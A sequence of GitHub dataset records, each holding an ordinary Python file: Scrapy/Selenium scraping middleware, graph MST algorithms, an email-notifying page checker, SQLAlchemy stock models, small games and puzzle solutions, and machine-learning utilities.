scrapy_selenium.SeleniumMiddleware class to handling the requests using the selenium d\n river\n for The YouTube page\n \"\"\"\n\n def process_request(self, request, spider):\n \"\"\"Process a request using the selenium driver if applicable\"\"\"\n\n if not isinstance(request, SeleniumRequest):\n return None\n\n self.driver.get(request.url)\n\n for cookie_name, cookie_value in request.cookies.items():\n self.driver.add_cookie(\n {\n 'name': cookie_name,\n 'value': cookie_value\n }\n )\n\n if request.wait_until:\n WebDriverWait(self.driver, request.wait_time).until(\n request.wait_until\n )\n\n scroll_height = self.driver.execute_script(\"return document.documentElement.scrollHeight\")\n while True:\n # Scroll down to bottom\n self.driver.execute_script(\"window.scrollTo(0, document.documentElement.scrollHeight);\")\n time.sleep(3.0)\n # Calculate new scroll height and compare with last scroll height\n new_scroll_height = self.driver.execute_script(\"return document.documentElement.scrollHeight\")\n if new_scroll_height == scroll_height:\n break\n scroll_height = new_scroll_height\n\n if request.screenshot:\n request.meta['screenshot'] = self.driver.get_screenshot_as_png()\n\n if request.script:\n self.driver.execute_script(request.script)\n\n body = str.encode(self.driver.page_source)\n\n # Expose the driver via the \"meta\" attribute\n request.meta.update({'driver': self.driver})\n\n return HtmlResponse(\n self.driver.current_url,\n body=body,\n encoding='utf-8',\n request=request\n )\n","repo_name":"datnnt1997/raker","sub_path":"raker/middlewares/youtube_middlewares.py","file_name":"youtube_middlewares.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"73813674128","text":"import operator\nfrom os import access\nimport sys\nsys.path.append(\"/Users/Xiaoguang/Study/CS/Interviews/2021-Google\")\n\nfrom operator import itemgetter\nfrom data_structure.src.disjoint_set import DisjointSet\nimport unittest\nimport heapq\n\ndef kruskal(graph):\n \"\"\"\n graph: List[List[Tuple[int, int]]] aka [ [(node_id, weight), ...], ... ]\n return: mst: List[Tuple[int, int, int]], mst_len: int\n \"\"\"\n if graph == None or len(graph) == 0:\n raise ValueError\n\n mst = []\n mst_len = 0\n \n nodes = range(len(graph))\n ds = DisjointSet()\n for node in nodes:\n ds.make_set(node)\n num_set = len(nodes)\n edges = sorted(_get_edges(graph), key=itemgetter(2)) # ElogE\n \n for from_node, to_node, weight in edges: # E\n if ds.find(from_node) != ds.find(to_node): # logV\n ds.union(from_node, to_node)\n num_set -= 1\n mst.append([from_node, to_node, weight])\n mst_len += weight\n \n if num_set != 1:\n raise Exception(\"Graph is disconnected\")\n \n return mst, mst_len\n\ndef _get_edges(graph):\n edges = []\n for from_node in range(len(graph)):\n for to_node, weight in graph[from_node]:\n edges.append((from_node, to_node, weight))\n return edges \n\ndef prim(graph):\n \"\"\"\n graph: List[List[Tuple[int, int]]] aka [ [(node_id, weight), ...], ... ]\n return: mst: List[Tuple[int, int, int]], mst_len: int\n \"\"\"\n if graph == None or len(graph) == 0:\n raise ValueError\n\n mst = []\n mst_len = 0\n \n start = 0\n frontier = [(0, start, None)]\n done = set()\n \n while frontier and len(done) != len(graph): # O(V)\n node_weight, node, node_parent = heapq.heappop(frontier) # O(logE)\n if node in done:\n continue\n mst.append((node_parent, node, node_weight))\n mst_len += node_weight\n done.add(node)\n for neighbor, weight in graph[node]:\n if neighbor not in done:\n heapq.heappush(frontier, (weight, neighbor, node)) # O(logE)\n \n if len(done) != len(graph):\n raise Exception(\"Graph is disconnected\")\n \n return mst[1:], mst_len\n\n# Graphs\n'''\n 0 - 1 - 2 - 3 - 4\n |_______|\n'''\ngraph1 = [\n [(1, 5)],\n [(0, 5), (2, 10), (3, 5)],\n [(1, 10), (3, 5)],\n [(1, 5), (2, 5), (4, 5)],\n [(3, 5)]\n]\n\nclass Test(unittest.TestCase):\n def test_kruskal_1(self):\n actual = kruskal(graph1)\n expected = ([(0, 1, 5), (1, 3, 5), (2, 3, 5), (3, 4, 5)], 20)\n self.assertEqual(actual, expected)\n \n def test_prim_1(self):\n actual = prim(graph1)\n expected = ([(0, 1, 5), (1, 3, 5), (3, 2, 5), (3, 4, 5)], 20)\n self.assertEqual(actual, expected)\n\nif __name__ == '__main__':\n unittest.main()\n \n","repo_name":"wxgisu/2021-Google-Interview","sub_path":"algorithms/practice/mst.1.py","file_name":"mst.1.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"43443501598","text":"#coding=utf-8\r\n\r\nimport requests\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\nimport smtplib\r\nfrom email.mime.text import MIMEText\r\nfrom email.header import Header\r\n\r\nurl=''\r\nheader={'Accept':'text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8','Accept-Encoding':'gzip, deflate','Accept-Language': 'zh-CN','Cache-Control': 'max-age=0','Connection': 'Keep-Alive','Cookie': 'JSESSIONID=A2D0D1F80BE6BCA4B61D5D8C82B8B241','Host': '222.206.176.104','Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763'}\r\nmail_host = \"[SMTPServer]\"\r\nmail_user = \"[YourEmail]\"\r\nmail_pass = \"[Your Password]\"\r\nsender = '[MailSender]'\r\nreceivers = ['PostMaster@qq.com']\r\ncontent = 'accessible'\r\ntitle = 'notice!'\r\n\r\n\r\ndef validate():\r\n\r\n response=requests.get(url,headers=header)\r\n\r\n time.sleep(60)\r\n\r\n html_doc=response.text\r\n\r\n soup=BeautifulSoup(html_doc,'lxml')\r\n\r\n request_url='http://222.206.176.104'+soup.find_all('a')[0]['href']\r\n\r\n request2url=requests.get(url=request_url,headers=header)\r\n\r\n time.sleep(120)\r\n\r\n if request2url.status_code=='200':\r\n sendEmail()\r\n exit(0)\r\n else:\r\n print('404')\r\n return 0\r\n\r\n\r\ndef sendEmail(): \r\n message = MIMEText(content, 'plain', 'utf-8') \r\n message['From'] = \"{}\".format(sender) \r\n message['To'] = \",\".join(receivers) \r\n message['Subject'] = title \r\n try: \r\n smtpObj = smtplib.SMTP_SSL(mail_host, 465) \r\n smtpObj.login(mail_user, mail_pass) \r\n smtpObj.sendmail(sender, receivers, message.as_string()) \r\n print(\"mail has been send successfully.\") \r\n except smtplib.SMTPException as e: \r\n print(e)\r\n\r\nif __name__=='__main__':\r\n while True:\r\n validate()\r\n","repo_name":"demingry/validation_script","sub_path":"validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"40290493419","text":"# coding=UTF-8\nimport os\nimport configparser\nfrom sqlalchemy import create_engine, Table, Column, Float, Integer, BigInteger, DATE, String, MetaData, ForeignKey , Index\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker , relationship, backref\n\nmConfigParser = configparser.RawConfigParser()\nmConfigParser.read(os.path.abspath('.') + '/config.ini')\ndb_host = mConfigParser.get('DB','host')\ndb_name = mConfigParser.get('DB','name')\ndb_username = mConfigParser.get('DB','username')\ndb_password = mConfigParser.get('DB','password')\ndb_port = mConfigParser.get('DB','port')\n\n\n# DB_CONNECT_STRING = \"sqlite:///:memory:\"\n# engine = create_engine(DB_CONNECT_STRING, echo=True)\n# DB_CONNECT_STRING = \"mysql+pymysql://root:gj4rm4_dylan@127.0.0.1:3306/stocker\"\nDB_CONNECT_STRING = \"mysql+pymysql://\"+db_username+\":\"+db_password+\"@\"+db_host+\":\"+db_port+\"/\"+db_name+\"\"\nengine = create_engine(DB_CONNECT_STRING, max_overflow=5)\n# engine = create_engine(DB_CONNECT_STRING, max_overflow=5, echo=True)\n\nBase = declarative_base()\n\nclass SecuritiesFirm(Base):\n\n __tablename__ = \"securities_firm\"\n\n branch_id = Column(\"branch_id\", String(50), primary_key=True)\n branch_name = Column(\"branch_name\", String(50))\n bank_id = Column(\"bank_id\", String(50))\n bank_name = Column(\"bank_name\", String(50))\n\n\ndef securities_firm_log_creator(tablename):\n class SecuritiesFirmLog(Base):\n\n __tablename__ = tablename\n # __table_args__ = (Index('securities_firm_log_index', \"branch_id\", \"stock_code\"), )\n\n id = Column(\"id\", Integer, primary_key=True, autoincrement=True)\n bank_id = Column(\"bank_id\", String(50))\n bank_name = Column(\"bank_name\", String(50))\n branch_id = Column(\"branch_id\", String(50), index=True)\n # branch_id = Column(String(50) , ForeignKey(\"securities_firm.branch_id\") )\n branch_name = Column(\"branch_name\", String(50))\n stock_name = Column(\"stock\", String(50))\n stock_code = Column(\"stock_code\", String(50), index=True)\n net_status = Column(\"net_status\", String(1))\n buy = Column(\"buy\", Integer)\n sell = Column(\"sell\", Integer)\n deviation = Column(\"deviation\", Integer)\n date = Column(\"date\", DATE)\n\n # securities_firm = relationship('SecuritiesFirm')\n\n Base.metadata.create_all(engine)\n\n return SecuritiesFirmLog \n\nclass Stocks(Base):\n \n __tablename__ = \"stocks\"\n\n code = Column(\"code\", String(50), primary_key=True)\n isin = Column(\"isin\", String(50)) \n name = Column(\"name\", String(50))\n market_category = Column(\"market_category\", String(50))\n securities_category = Column(\"securities_category\", String(50))\n industry = Column(\"industry\", String(50))\n issue_date = Column(\"issue_date\", DATE)\n cfi_code = Column(\"cfi_code\", String(50))\n remark = Column(\"remark\", String(255))\n\n\ndef stocks_log_creator(tablename):\n\n class StocksLog(Base):\n\n __tablename__ = tablename\n\n id = Column(\"id\", Integer, primary_key=True, autoincrement=True)\n name = Column(\"name\", String(50))\n code = Column(\"code\", String(50), index=True)\n opening_price = Column(\"opening_price\", String(50))#開盤價\n highest_price = Column(\"highest_price\", String(50))#最高價\n lowest_price = Column(\"lowest_price\", String(50))#最低價\n closing_price = Column(\"closing_price\", String(50))#收盤價\n change = Column(\"change\", String(50))#漲跌價差\n trade_volume = Column(\"trade_volume\", BigInteger)#成交股數\n trade_value = Column(\"trade_value\", BigInteger)#成交金額\n transaction = Column(\"transaction\", Integer)#成交筆數\n taiwan_date = Column(\"taiwan_date\", String(50))\n date = Column(\"date\", DATE)\n\n Base.metadata.create_all(engine)\n\n return StocksLog \n\n#創建表(如果表已存在不創建)\n# SecuritiesFirmLogCreator(\"securities_firm_log\")\nBase.metadata.create_all(engine)\nDB_Session = sessionmaker(bind=engine)\nsession = DB_Session()\n\n\n","repo_name":"ryan19901222/stock-analysis","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"28030985348","text":"import picamera\nimport time\nimport subprocess\n\nwith picamera.PiCamera() as cam:\n for i in range(1,10):\n filename = \"test\" + format(i, \"03d\") + \".jpg\"\n cam.capture(filename)\n #subprocess.call([\"raspistill\", \"-n\", \"-t\", \"1\", \"-w\", \"200\",\n # \"-h\", \"200\", \"-co\", \n # \"90\", \"-ifx\", \"sketch\", \"-e\", \"jpg\",\n # \"-e\", \"jpg\", \"-o\", filename])\n print(\"taking photo\", i)\n\n print(\"Encoding...\")\n subprocess.call([\"avconv\", \"-r\", \"5\", \"-i\", \"test%03d.jpg\", \"-r\", \"24\", \"-s\", \"200x200\", \n \"-vsync\", \"cfr\" , \"out.h264\"])\n","repo_name":"Allenliu0703/pi2-workshop","sub_path":"pi_camera_ex1.py","file_name":"pi_camera_ex1.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"21336726590","text":"keyboard = ['qwertyuiop',\n'asdfghjkl',\n'zxcvbnm']\nkeyval = {}\nfor linenbr, line in enumerate(keyboard):\n for index, letter in enumerate(line):\n keyval[letter] = (linenbr, index)\ndef diff(a, b):\n (x1, y1) = keyval[a]\n (x2, y2) = keyval[b]\n return abs(x1 - x2) + abs(y1- y2)\n\ndef count(w, orig):\n cnt = 0\n for index in range(len(orig)):\n cnt += diff(w[index], orig[index])\n return cnt\n\nT = int(raw_input())\nfor t in range(T):\n word, cstr = raw_input().split()\n c = int(cstr)\n cand = [raw_input() for _ in range(c)]\n diffs = [(count(x,word), x) for x in cand]\n diffs.sort()\n for cnt, w in diffs:\n print('{} {}'.format(w, cnt))\n \n ","repo_name":"majstenmark/kattis","sub_path":"AirConditioned/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"33240627644","text":"import pygame\nfrom sys import exit\nfrom pygame import mixer\n\n\ndef ball_animation():\n global ball_speed_x, ball_speed_y\n ball.x += ball_speed_x\n ball.y += ball_speed_y\n\n if ball.top <= 0 or ball.bottom >= screen_height:\n # ball_speed_y = ball_speed_y * -1 #reverse it\n ball_speed_y = -ball_speed_y\n if ball.left <= 0 or ball.right >= screen_width:\n # ball_speed_x = ball_speed_x * -1\n ball_speed_x = -ball_speed_x\n\n if ball.colliderect(player) or ball.colliderect(opponent):\n ball_speed_x = ball_speed_x * -1\n\n\ndef player_animation():\n player.y += player_speed\n if player.top <= 0:\n player.top = 0\n if player.bottom >= screen_height:\n player.bottom = screen_height\n\n\ndef opponent_ai():\n if opponent.top < ball.y:\n opponent.top += opponent_speed\n if opponent.bottom > ball.y:\n opponent.bottom -= opponent_speed\n if opponent.top <= 0:\n opponent.top = 0\n if opponent.bottom >= screen_height:\n opponent.bottom = screen_height\n\n\n#basic setup\npygame.init()\nscreen_width = 640\nscreen_height = 480\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption('Pong Game')\nicon = pygame.image.load('Ball.png')\npygame.display.set_icon(icon)\nclock = pygame.time.Clock()\n\n#Game rectangles\nball = pygame.Rect(screen_width / 2 - 15, screen_height / 2 - 15, 30, 30) #left, right, top, bottom\nplayer = pygame.Rect(screen_width - 20, screen_height / 2 - 70, 10, 140)\nopponent = pygame.Rect(10, screen_height / 2 - 70, 10, 140)\n\nbg_color = pygame.Color('grey12')\nlight_grey = (200, 200, 200)\n\nball_speed_x = 7\nball_speed_y = 7\n\nplayer_speed = 0\nopponent_speed = 0\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n exit()\n if event.key == pygame.K_DOWN:\n player_speed += 7\n if event.key == pygame.K_UP:\n player_speed -= 7\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_DOWN:\n player_speed -= 7\n if event.key == pygame.K_UP:\n player_speed += 7\n\n ball_animation()\n player_animation()\n opponent_ai()\n\n #Visuals\n screen.fill(bg_color)\n pygame.draw.rect(screen, light_grey, player)\n pygame.draw.rect(screen, light_grey, opponent)\n pygame.draw.ellipse(screen, light_grey, ball)\n pygame.draw.aaline(screen, light_grey, (screen_width / 2, 0), (screen_width / 2, screen_height))\n\n #updating the window\n pygame.display.update()\n clock.tick(60)\n\n\n#opponents top above ball: move down\n#opponents bottom below ball: move up\n#speed of opponent determines difficulty","repo_name":"praise002/pygame-projects","sub_path":"pong game/pong_game.py","file_name":"pong_game.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"13085350656","text":"\"\"\"Weather data file communication.\"\"\"\nimport logging\nimport json\n\nfrom helper.helper import isFloat\n\n\ndef setWeatherData(weatherForecast):\n \"\"\"Write to file weather for inter applications communication.\n\n Args:\n weatherForecast (dictionary): town, temperature and humidity\n \"\"\"\n try:\n fileName = '/tmp/WeatherData.txt'\n logging.info(f'Writing weather data file {fileName}')\n with open(fileName, 'w') as f_obj:\n json.dump(weatherForecast, f_obj)\n except Exception as ex:\n logging.error(f'Unexpected error: {fileName} is', repr(ex))\n exit()\n\n\ndef getWeatherData():\n \"\"\"Read from file weather for inter applications communication.\n\n Returns:\n list: town, temperature and humidity\n \"\"\"\n currTown = currTemp = currHumidity = None\n\n try:\n fileName = '/tmp/WeatherData.txt'\n logging.info(f'Reading weather data file {fileName}')\n with open(fileName, 'r+') as f_obj:\n weatherForecast = json.load(f_obj)\n except FileNotFoundError:\n logging.exception('Can’t find {0}.'.format(fileName))\n exit()\n except Exception as ex:\n logging.error(f'Unexpected error: {fileName} is', repr(ex))\n exit()\n else:\n logging.info(weatherForecast)\n\n if 'town' in weatherForecast:\n currTown = weatherForecast['town']\n\n if 'temp' in weatherForecast and isFloat(weatherForecast['temp']):\n currTemp = float(weatherForecast['temp'])\n\n if 'humidity' in weatherForecast and \\\n isFloat(weatherForecast['humidity']):\n currHumidity = float(weatherForecast['humidity'])\n\n return [currTown, currTemp, currHumidity]\n","repo_name":"gabrielh90/weather","sub_path":"helper/WeatherFileCommunication.py","file_name":"WeatherFileCommunication.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"2595391610","text":"# BOJ_2309 일곱난쟁이\n\nlst = []\nfor _ in range(9):\n lst.append(int(input()))\n\nlst.sort()\ntotal = sum(lst)\n\ncml = False\nfor i in range(len(lst) - 1):\n for j in range(i + 1, len(lst)):\n if total - lst[i] - lst[j] == 100:\n lst.pop(j)\n lst.pop(i)\n cml = True\n break\n if cml:\n break\n\nfor ls in lst:\n print(ls)\n# print(*lst)\n","repo_name":"ChangMinL2E/dlckdals1004-naver.com","sub_path":"BOJ/BOJ_2309.py","file_name":"BOJ_2309.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"72912250127","text":"from mu.mel import ji\n\nimport functools\nimport operator\n\n\"\"\"This module implements harmonic functions.\n\nThose harmonic functions are unlike traditional harmonic theory\nnot connected to a specific chord, but rather to a specific pitch.\nEach mode has 3 main functions / pitches. Those are all pitches that can\nbe found in the GONG - note of the corresponding mode.\nFor the mode x*y*z, the 3 main functions are:\n o: x*y\n w: x*z\n m: y*z\nAdditionaly every outer function, that's not part of the mode, is defined as:\n n: U*z (connection between w and m)\n ow: U*x (connection between o and w)\n om: U*y (connection between o and m)\nU is the fourth prime number, that is not part of the current mode.\n\nEach of the inner functions (o, w, m) can be played simultanously with the GONG.\nIn this case they are written in upper letters (O, W, M).\n\nAdditionaly every function has two sidefunctions. Those sidefunctions\nhave the form a/b or b/a. They are named after their mother function\nplus the prime number, that remains stable.\nFor instance:\n o: x*y\n ox: x/y\n oy: y/x\n\"\"\"\n\n\nclass Function(object):\n \"\"\"Harmonic function, descriped by the two prime numbers it contains.\n\n A harmonic function can be played with or without the gong.\n Every harmonic function has two sidefunctions.\n \"\"\"\n\n def __init__(self, name: str, key, gong: bool) -> None:\n self.__name = name\n self.__key = key\n self.__gong = gong\n\n def __repr__(self) -> str:\n return self.__name\n\n def __eq__(self, other) -> bool:\n try:\n tests = (\n self.gong == other.gong,\n self.__key == other.__key,\n type(self) == type(other),\n )\n return all(tests)\n except AttributeError:\n return False\n\n def __hash__(self) -> int:\n return hash(self.identity)\n\n @property\n def gong(self) -> bool:\n return self.__gong\n\n @property\n def identity(self) -> tuple:\n return self.__key.identifier\n\n def __call__(self, mode) -> ji.JIPitch:\n \"\"\"Return real pitch depending on the corresponding mode.\n\n This pitch is in no specific octave yet.\n \"\"\"\n primes = functools.reduce(operator.mul, self.__key(mode))\n if mode.gender:\n return ji.r(primes, 1)\n else:\n return ji.r(1, primes)\n\n\nclass SideFunction(Function):\n def __init__(self, name: str, key) -> None:\n Function.__init__(self, name, key, False)\n\n def __call__(self, mode):\n \"\"\"Return real pitch depending on the corresponding mode.\n\n This pitch is in no specific octave yet.\n \"\"\"\n primes = self.__key(mode)\n if not mode.gender:\n primes = tuple(reversed(primes))\n return ji.r(primes[0], primes[1])\n\n\nclass Identifier(object):\n \"\"\"\n \"\"\"\n\n def __init__(self, p0: str, p1: str) -> None:\n self.__identifier = (p0, p1)\n\n @property\n def identifier(self) -> tuple:\n return self.__identifier\n\n def __call__(self, mode) -> tuple:\n \"\"\"Return the relevant prime numbers from the mode.\"\"\"\n return tuple(getattr(mode, identity) for identity in self.__identifier)\n\n def __eq__(self, other) -> bool:\n try:\n return self.identifier == other.identifier\n except AttributeError:\n return False\n\n\ndef __init_functions():\n func_name_and_identifier = (\n (\"m\", \"y\", \"z\"), # tonica\n (\"w\", \"x\", \"z\"), # subdominant\n (\"o\", \"x\", \"y\"), # dominant\n (\"n\", \"U\", \"z\"),\n (\"om\", \"U\", \"y\"),\n (\"ow\", \"U\", \"x\"),\n )\n\n functions = {}\n\n for information in func_name_and_identifier:\n name, p0, p1 = information\n name_sf0 = name + p0\n name_sf1 = name + p1\n identifier = Identifier(p0, p1)\n identifier_sf1 = Identifier(p1, p0)\n to_update = {\n name: Function(name, identifier, False),\n name_sf0: SideFunction(name_sf0, identifier),\n name_sf1: SideFunction(name_sf1, identifier_sf1),\n }\n if name in (\"m\", \"w\", \"o\"):\n to_update.update(\n {name.upper(): Function(name.upper(), identifier, True)}\n )\n functions.update(to_update)\n\n return functions\n\n\nFUNCTIONS = __init_functions()\n","repo_name":"levinericzimmermann/nongkrong","sub_path":"nongkrong/harmony/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"14093191437","text":"import json\nimport os\nfrom typing import List, Tuple\n\nfrom paddlenlp.utils.downloader import COMMUNITY_MODEL_PREFIX, get_path_from_url\nfrom paddlenlp.utils.env import MODEL_HOME\nfrom paddlenlp.utils.log import logger\n\nCOMMUNITY_MODEL_CONFIG_FILE_NAME = \"community_models.json\"\n\n\ndef load_community_models() -> List[Tuple[str, str]]:\n \"\"\"load community models based on remote models.json\n\n Returns:\n List[Tuple[str, str]]: the name tuples of community models\n \"\"\"\n # 1. check & download community models.json\n local_community_model_config_path = os.path.join(MODEL_HOME, \"community_models.json\")\n\n if not os.path.exists(local_community_model_config_path):\n logger.info(\"download community model configuration from server ...\")\n remote_community_model_path = \"/\".join([COMMUNITY_MODEL_PREFIX, COMMUNITY_MODEL_CONFIG_FILE_NAME])\n cache_dir = os.path.join(MODEL_HOME)\n local_community_model_config_path = get_path_from_url(remote_community_model_path, root_dir=cache_dir)\n\n # 2. load configuration\n #\n # config = {\n # \"model_name\": {\n # \"type\": \"\",\n # \"files\": [\"\", \"\"]\n # }\n # }\n #\n\n with open(local_community_model_config_path, \"r\", encoding=\"utf-8\") as f:\n config = json.load(f)\n\n model_names = set()\n for model_name, obj in config.items():\n model_names.add((model_name, obj.get(\"model_type\", \"\")))\n logger.info(f\"find {len(model_names)} community models ...\")\n return model_names\n","repo_name":"PaddlePaddle/PaddleNLP","sub_path":"paddlenlp/cli/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":10561,"dataset":"github-code","pt":"65"} +{"seq_id":"31824775662","text":"__author__ = \"Santiago Silva\"\n__copyright__ = \"Copyright 2018\"\n__description__ = \"\"\"\nCurvelet feature extraction. USAGE:\n python3 plsr_analysis.py -s [number_of_scales] -a [number_of_angles]\n\"\"\"\n\nimport os\nimport gc\nimport sys\nimport argparse\nfrom tqdm import tqdm\nfrom os.path import join, dirname, realpath\n\nimport warnings\nwarnings.filterwarnings(\"ignore\", message=\"numpy.dtype size changed\")\n\ntry:\n import pyct as ct\nexcept ImportError as e:\n print('[ ERROR ] {}'.format(e))\n\nimport numpy as np\nimport pandas as pd\n\nroot = dirname(dirname(dirname(realpath(__file__))))\nsys.path.append(join(root))\n\nfrom lib.curvelets import clarray_to_gen_gaussian_dict\nfrom lib.path import get_file_list, mkdir\n\n\ndef main():\n # Create Curvelet object for 360x180 px\n A = ct.fdct2(\n (360,180), \n nbs=n_scales, \n nba=n_angles, \n ac=True, \n norm=False, \n vec=True, \n cpx=False)\n\n\n print('Processing subject ' + subject)\n \n # Set filename(s)\n raw_folder = join(results_folder, subject, 'raw')\n \n # Initialize a feature dictionary per subject\n f_dict = {}\n f_dict['subject'] = subject\n f_dict['target'] = label\n f_dict['n_scales'] = n_scales\n f_dict['n_angles'] = n_angles\n \n for r in tqdm(sphere_radius, desc='Sphere scale'):\n # for r in sphere_radius:\n # Get type of image and sphere params\n raw_file = join(\n raw_folder,\n '%s_%03d_to_%03d_solid_angle_to_sphere.raw' % (\n img_type, r, (r + delta)\n ))\n \n # Load and do the magic!\n try:\n img = np.fromfile(raw_file, dtype=np.float).reshape([360, 180]).T\n except:\n print('No file found: ' + raw_file)\n \n # Get a Curvelet decomposition\n f = A.fwd(img)\n print(f.shape)\n\n # Convert data to dict\n buff = clarray_to_gen_gaussian_dict(A, f, n_scales, n_angles, r)\n f_dict.update(buff)\n del buff, f, img\n\n # Save subject results\n subject_feats_file = join(output_subfolder, '%s.npz' % subject)\n np.savez_compressed(subject_feats_file, **f_dict)\n\n # Give permissions\n os.system('chmod 777 ' + subject_feats_file)\n os.system('chmod -R 777 ' + output_subfolder)\n\n\nif __name__ == '__main__':\n # --- ARG PARSING ---\n parser = argparse.ArgumentParser(description=__description__)\n parser.add_argument('-f', metavar='--folder',\n help='Subjects\\' folder.',\n default='/user/ssilvari/home/Documents/temp/sphere_mapped')\n parser.add_argument('-s', metavar='--scales',\n help='Number of scales.',\n type=int,\n default=6)\n parser.add_argument('-a', metavar='--angles',\n help='Number of angles (subbands) per scale.',\n type=int,\n default=8)\n parser.add_argument('-t', metavar='--type',\n help='type of image (intensity, gradient)',\n default='gradient')\n parser.add_argument('-subject', metavar='--type',\n help='Subject ID',\n default='002_S_0729')\n parser.add_argument('-label', metavar='--type',\n help='Label of patient (diagnosis)',\n default='MCIc')\n args = parser.parse_args()\n \n # --- MAIN ---\n # Set parameters\n n_scales = args.s\n n_angles = args.a\n img_type = args.t\n subject = args.subject\n label = args.label\n target = label == 'MCIc'\n results_folder = args.f\n\n output_folder = join(root, 'output')\n output_subfolder = join(output_folder, 'curv_feats_%s_nscales_%d_nangles_%d' % (img_type, n_scales, n_angles))\n \n try:\n os.mkdir(output_subfolder)\n except OSError:\n pass\n\n step = 25 # Propagation step\n delta = 25 # Sphere thickness\n sphere_radius = [i for i in range(0, 100, step)]\n\n # Start main\n main()","repo_name":"sssilvar/CSD-AD","sub_path":"test/trash/feature_extraction_individual.py","file_name":"feature_extraction_individual.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"5412693311","text":"# Count unique paths with given sum in an N-ary Tree\r\n# Given an integer X and integer N, the task is to find the number of unique paths starting from the root in N - ary tree\r\n# such that the sum of all these paths is equal to X.The N - ary tree satisfies the following conditions:\r\n# All the nodes have N children and the weight of each edge is distinct and lies in the range[1, N].\r\n# The tree is extended up to the infinity.\r\n\r\n# Python3 program for the above approach\r\nmod = int(1e9 + 7)\r\n\r\n\r\n# Function for counting total\r\n# no of paths possible with\r\n# the sum is equal to X\r\ndef findTotalPath(X, n, dp):\r\n # If the path of the sum\r\n # from the root to current\r\n # node is stored in sum\r\n if (X == 0):\r\n return 1\r\n\r\n ans = 0\r\n\r\n # If already commputed\r\n if (dp[X] != -1):\r\n return dp[X]\r\n\r\n # Count different no of paths\r\n # using all possible ways\r\n for i in range(1, min(X, n) + 1):\r\n ans = ans + findTotalPath(X - i, n, dp) % mod;\r\n ans %= mod;\r\n\r\n # Return total no of paths\r\n dp[X] = ans\r\n return ans\r\n\r\n\r\n# Driver Code\r\nif __name__ == '__main__':\r\n n = 3\r\n X = 2\r\n\r\n # Stores the number of ways\r\n # to obtains sums 0 to X\r\n dp = [-1] * (X + 1)\r\n\r\n # Function call\r\n print(findTotalPath(X, n, dp))","repo_name":"Gaju27/Assignment_17_B","sub_path":"count_unique_path_in_nary_tree.py","file_name":"count_unique_path_in_nary_tree.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"15638572146","text":"from functions import *\n\nif __name__ == '__main__':\n file_students = 'students.json'\n file_professions = 'professions.json'\n\n data_students = load_students(file_students)\n data_professions = load_professions(file_professions)\n\n user_pk = int(input('Введите номер студента \\n'))\n '''получить ввод pk пользователя'''\n student = get_student_by_pk(user_pk, data_students)\n\n if student:\n '''Если такой студент есть – выведите информацию о пользователе'''\n print(f'Студент {student[\"full_name\"]}')\n str_skills = ', '.join(student[\"skills\"])\n print(f'Знает {str_skills}')\n else:\n '''Если такого студента нет - завершитесь'''\n print('У нас нет такого студента')\n quit()\n\n title = input('Выберите специальность для оценки студента \\n')\n '''Получите ввод title профессии '''\n profession = get_profession_by_title(title, data_professions)\n '''Проверьте существование такой профессии\nЕсли да – получите соответствие с помощью check_fitness'''\n\n if not profession:\n '''Если нет – завершитесь'''\n print('У нас нет такой специальности')\n quit()\n\n data = check_fitness(student, profession)\n print(show_result(data, student['full_name']))\n","repo_name":"klotzl/Homework_7","sub_path":"Homework_7/homework_7.py","file_name":"homework_7.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"11757364902","text":"import tensorflow as tf\nimport numpy as np\nimport time\n\nfrom PTBReader import *\n\n\nclass LSTMLanguageModel(object):\n def __init__(self,hparams, mode):\n #self.sess = sess\n #self.summary_writer = summary_writer\n self.hparams = hparams\n\n print(self.hparams)\n self.mode = mode\n\n self.vocab_size = self.hparams.vocab_size\n\n self.reader = PTBReader(data_dir=\"../data\",dataset_name=\"ptb\", vocab_size=10000)\n self.initializer = 